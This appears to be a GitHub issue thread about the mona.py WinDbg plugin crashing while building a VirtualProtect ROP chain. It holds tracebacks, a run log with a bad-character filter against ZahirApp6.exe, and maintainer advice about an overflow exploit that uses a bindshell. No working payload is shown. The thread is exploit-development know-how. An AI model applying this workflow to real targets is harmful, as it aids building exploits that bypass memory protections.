mona: Mona failed to produce ropchain, got exception errors regarding IAT

When opening a new issue, please fill out the following sections:

Expected behavior

mona.py completes the ropchain/rop chain creation function.

Actual behavior

Mona throw errors when trying to produce VirtualProtect ropchain. The issue is the same case as someone here https://github.com/corelan/mona/issues/44 but I got more errors.

Steps to reproduce the problem

Other useful information (mona version, debugger & debugger version, OS version, etc)

Last logs related to errors

************* Symbol Loading Error Summary **************
Module name            Error
Tee710                 The system cannot find the file specified

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2951, in getIAT
    thisfuncfullname = thisfunc.getName().lower()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1819, in getName
    syms = thismod.getSymbols()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1556, in getSymbols
    ntHeader = getNtHeaders(self.modbase)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 109, in getNtHeaders
    return pykd.module("ntdll").typedVar(ntheaders, modulebase + pykd.ptrDWord(modulebase + 0x3c))
TypeException: _IMAGE_NT_HEADERS : symbol name is not found

** Error trying to process module TeeUI710.bpl
** Error trying to process module TeeUI710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvDlgs100.bpl
** Error trying to process module JvDlgs100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module vclactnband100.bpl
** Error trying to process module vclactnband100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvStdCtrls100.bpl
** Error trying to process module JvStdCtrls100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module rtl100.bpl
** Error trying to process module rtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module VclSmp100.bpl
** Error trying to process module VclSmp100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module TeeDB710.bpl
** Error trying to process module TeeDB710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module xmlrtl100.bpl
** Error trying to process module xmlrtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JclVcl100.bpl
** Error trying to process module JclVcl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module Windows.StateRepositoryPS.dll
********************************************************************************
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 19097, in main
    commands[command].parseProc(opts)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 12050, in procROP
    findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 6558, in findROPGADGETS
    vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 8812, in createRopChains
    thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 9572, in getPickupGadget
    allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 7601, in findPattern
    outside = getRangesOutsideModules()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5344, in getRangesOutsideModules
    populateModuleInfo()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5818, in populateModuleInfo
    thismod = MnModule(key)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2720, in __init__
    mzbase    = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

********************************************************************************

Thank you for your help Peter.

About this issue

  • Original URL
  • State: closed
  • Created 4 years ago
  • Comments: 30 (14 by maintainers)

Most upvoted comments

It works and very fast too!! Thanks a lot Peter!

0:000> .load pykd.pyd;!py mona up
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py up
[+] Version compare :
    Current Version : '2.0', Current Revision : 611
    Latest Version : '2.0', Latest Revision : 612
[+] New version available
    Updating to '2.0' r612
    Done
[+] Current version : '2.0' r612
[+] Locating windbglib path
[+] Checking if C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py needs an update...
[+] Version compare :
    Current Version : '1.0', Current Revision : 145
    Latest Version : '1.0', Latest Revision : 145
[+] You are running the latest version

[+] This mona.py action took 0:00:47.881000
0:000> !py mona rop -cpb '\x00\x0a\x0d\x22\x2c' -m Jcl100.bpl -s virtualprotect
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py rop -cpb '\x00\x0a\x0d\x22\x2c' -m Jcl100.bpl -s virtualprotect

---------- Mona command started on 2020-07-13 03:44:46 (v2.0, rev 612) ----------
[+] Processing arguments and criteria
    - Pointer access level : X
    - Only querying modules Jcl100.bpl
    - Bad char filter will be applied to pointers : '\x00\x0a\x0d\x22\x2c' 
[+] Generating module info table, hang on...
    - Processing modules
    - Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_ZahirApp6.exe_5976.log'
    - (Re)setting logfile C:\monalogs\ZahirApp6\_rop_progress_ZahirApp6.exe_5976.log
[+] Progress will be written to _rop_progress_ZahirApp6.exe_5976.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Only creating rop chain for 'virtualprotect'
[+] Enumerating 22 endings in 1 module(s)...
    - Querying module Jcl100.bpl
    - Search complete :
       Ending : RETN 0x0C, Nr found : 159
       Ending : RETN 0x1C, Nr found : 4
       Ending : RETN 0x0A, Nr found : 1
       Ending : RETN, Nr found : 15484
       Ending : RETN 0x20, Nr found : 2
       Ending : RETN 0x18, Nr found : 37
       Ending : RETN 0x08, Nr found : 371
       Ending : RETN 0x24, Nr found : 2
       Ending : RETN 0x02, Nr found : 2
       Ending : RETN 0x10, Nr found : 42
       Ending : RETN 0x00, Nr found : 17
       Ending : RETN 0x14, Nr found : 15
       Ending : RETN 0x04, Nr found : 404
    - Filtering and mutating 16540 gadgets
      - Progress update : 1000 / 16540 items processed (Mon 2020/07/13 03:46:12 AM) - (6%)
      - Progress update : 2000 / 16540 items processed (Mon 2020/07/13 03:46:50 AM) - (12%)
      - Progress update : 3000 / 16540 items processed (Mon 2020/07/13 03:47:11 AM) - (18%)
      - Progress update : 4000 / 16540 items processed (Mon 2020/07/13 03:47:25 AM) - (24%)
      - Progress update : 5000 / 16540 items processed (Mon 2020/07/13 03:48:16 AM) - (30%)
      - Progress update : 6000 / 16540 items processed (Mon 2020/07/13 03:48:58 AM) - (36%)
      - Progress update : 7000 / 16540 items processed (Mon 2020/07/13 03:49:15 AM) - (42%)
      - Progress update : 8000 / 16540 items processed (Mon 2020/07/13 03:49:40 AM) - (48%)
      - Progress update : 9000 / 16540 items processed (Mon 2020/07/13 03:49:59 AM) - (54%)
      - Progress update : 10000 / 16540 items processed (Mon 2020/07/13 03:50:15 AM) - (60%)
      - Progress update : 11000 / 16540 items processed (Mon 2020/07/13 03:50:35 AM) - (66%)
      - Progress update : 12000 / 16540 items processed (Mon 2020/07/13 03:50:47 AM) - (72%)
      - Progress update : 13000 / 16540 items processed (Mon 2020/07/13 03:50:58 AM) - (78%)
      - Progress update : 14000 / 16540 items processed (Mon 2020/07/13 03:51:10 AM) - (84%)
      - Progress update : 15000 / 16540 items processed (Mon 2020/07/13 03:51:26 AM) - (90%)
      - Progress update : 16000 / 16540 items processed (Mon 2020/07/13 03:51:41 AM) - (96%)
      - Progress update : 16540 / 16540 items processed (Mon 2020/07/13 03:51:46 AM) - (100%)
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
VirtualProtect
VirtualAlloc
[+] Attempting to produce rop chain for VirtualProtect
    Mon 2020/07/13 03:52:03 AM: Step 1/7: esi
** Error trying to process module kernelbase.dll
** Error trying to process module kernel32.dll
    Getting IAT for Jcl100.bpl.
    Enumerating IAT

************* Symbol Loading Error Summary **************
Module name            Error
rtl100                 The system cannot find the file specified

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
[+] Searching from 0x48000000 to 0x48324000
    Mon 2020/07/13 03:55:07 AM: Step 2/7: ebp
    Mon 2020/07/13 03:55:08 AM: Step 3/7: ebx
    Mon 2020/07/13 03:55:08 AM: Step 4/7: edx
    Mon 2020/07/13 03:55:08 AM: Step 5/7: ecx
    Mon 2020/07/13 03:55:08 AM: Step 6/7: edi
    Mon 2020/07/13 03:55:08 AM: Step 7/7: eax
[+] Preparing output file 'Jcl100.bpl_virtualprotect.xml'
    - (Re)setting logfile C:\monalogs\ZahirApp6\Jcl100.bpl_virtualprotect.xml
[+] Preparing output file 'rop_chains.txt'
    - (Re)setting logfile C:\monalogs\ZahirApp6\rop_chains.txt
[+] ROP chains written to file C:\monalogs\ZahirApp6\rop_chains.txt

[+] This mona.py action took 0:11:44.871000

quick update: can you try this:

  • Create a version of the exploit that only contains breakpoints instead of bindshell
  • run the application, attach windbg to the first ZahirApp6.exe process
  • trigger the overflow, make it hit the breakpoints
  • break windbg, check if the bpl modules are loaded now
  • run `!py mona rop -cpb ‘\x00\x0a\x0d\x22\x2c’``

(still running on my system. with almost 115K+ gadgets, will take a while to complete. Might be better to restrict it to just a few modules instead of all bpl modules)